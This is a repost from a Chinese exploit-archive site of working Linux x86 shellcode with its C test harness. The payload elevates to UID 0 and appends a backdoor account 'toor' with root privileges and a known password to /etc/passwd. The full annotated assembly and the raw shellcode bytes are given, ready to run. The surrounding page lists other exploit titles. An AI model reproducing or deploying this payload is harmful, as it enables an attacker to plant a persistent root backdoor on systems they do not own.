首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 linux/x86 setreuid(0) and add user with root's priviledges 105 bytes 来源：vfocus.net 作者：xertux 发布时间：2010-09-28   #include <stdio.h> /*   * Title : linux x86 shellcode setreuid(0, 0) and add an user with root's priviledges on /etc/passwd, 105 bytes   * Author : xertux   * Platform: Linux X86   * Description : setuid(0) + open(/etc/passwd, e0x441, 0x180) + write(fd, toor:Gf.Dz3qr2izHU:0:0::/:/bin/sh\n, 34) + close(fd)   * Add an user "toor" with password "toor" and the root's priviledges at the end of "/etc/passwd"   * Size : 105 bytes   * */ /* BITS 32 ;setresuid(0,0) xor eax, eax         ; eax become 0 xor ebx, ebx         ; ebx become 0 xor ecx, ecx         ; ecx become 0 cdq                  ; edx become 0 mov al, 0xa4         ; put call system 164 into eax int 0x80             ; execute setresuid(0,0,0) ;open(/etc/passwd, e0x441, 0x180) push edx             ; null string termination push 0x64777373      ; push "sswd" push 0x61702f2f      ; push "//pa" push 0x6374652f      ; push "/etc" mov ebx, esp         ; put "/etc//passwd" into ebx mov WORD cx, 0x441   ; put the O_WRONLY | O_APPEND | O_CREATE argument mov WORD dx, 0x180   ; put the S_IRUSR | S_IWUSR argument push BYTE 0x5        ; put call system open on the stack pop eax              ; get the system call number and insert into eax int 0x80             ; execute open(/etc//passwd, O_WRONLY | O_APPEND, S_IRUSR | S_IWUSR) ;write(fd, toor:Gf.Dz3qr2izHU:0:0::/:/bin/sh\n, 34) ==> pass "toor" mov ebx, eax         ; put the file descriptor return by open into ebx xor eax, eax         ; eax become 0 push eax             ; null termination string push WORD 0x0a68     ; push "h\n" push 0x732f6e69      ; push "in/s" push 0x622f3a2f      ; push "/:/b" push 0x3a3a303a      ; push ":0::" push 0x303a5548      ; push "HU:0" push 0x7a693272      ; push "r2iz" push 0x71337a44      ; push "Dz3q" push 0x2e66473a      ; push ":Gf." push 0x726f6f74      ; push "toor" mov ecx, esp         ; put "toor:toor:0:0::/:/bin/sh\n" into ebx push BYTE 34         ; put the size of line written on the stack pop edx              ; get the size into edx mov al, 0x4          ; put the call system write into eax int 0x80             ; execute write(fd, toor:toor:0:0::/:/bin/sh\n, 34) ;close(fd) push BYTE 0x6        ; put the call system close on the stack pop eax              ; put the call system number into eax int 0x80             ; execute close(fd) */ char shellcode[] = "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x52\x68\x73\x73\x77" "\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe3\x66\xb9\x41" "\x04\x66\xba\x80\x01\x6a\x05\x58\xcd\x80\x89\xc3\x31\xc0\x50\x66" "\x68\x68\x0a\x68\x69\x6e\x2f\x73\x68\x2f\x3a\x2f\x62\x68\x3a\x30" "\x3a\x3a\x68\x48\x55\x3a\x30\x68\x72\x32\x69\x7a\x68\x44\x7a\x33" "\x71\x68\x3a\x47\x66\x2e\x68\x74\x6f\x6f\x72\x89\xe1\x6a\x22\x5a" "\xb0\x04\xcd\x80\x6a\x06\x58\xcd\x80"; int main() { printf("[*] Shellcode - length: %d\n", strlen(shellcode)); (*(void(*)())shellcode)(); return 0; }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Yahoo! Messenger 10 (PhotoShar ·linux/x86 setreuid(0,0) and ad ·Realtek (InstallShield-RTCOMDL ·Acunetix Ltd 2010 Version 6.5 ·PDF Creator Pilot (PDFCreatorP ·winstyler (winstyler.exe) DLL ·BS.Player 2.56 (Build 1043) .m ·Fichier Identificateur numriqu ·Gokhun ASP Stok v1.0 Multiple ·VLC 1.0.5 Golden eye DLL Hijac ·Windows Mobile 6.5 TR Phone Ca ·Opera 10.51 DLL Hijacking Expl   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved